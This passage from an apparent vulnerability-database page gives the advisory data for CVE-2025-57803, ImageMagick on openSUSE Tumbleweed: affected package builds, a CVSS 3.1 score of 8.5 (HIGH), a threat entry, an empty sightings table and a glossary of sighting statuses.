"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-config-7-SUSE-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-doc-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:ImageMagick-extra-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-7_Q16HDRI5-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagick++-devel-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickCore-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-32bit-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:libMagickWand-7_Q16HDRI10-7.1.2.2-2.1.x86_64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.aarch64",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.ppc64le",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.s390x",
"openSUSE Tumbleweed:perl-PerlMagick-7.1.2.2-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-08-28T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-57803"
}
]
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.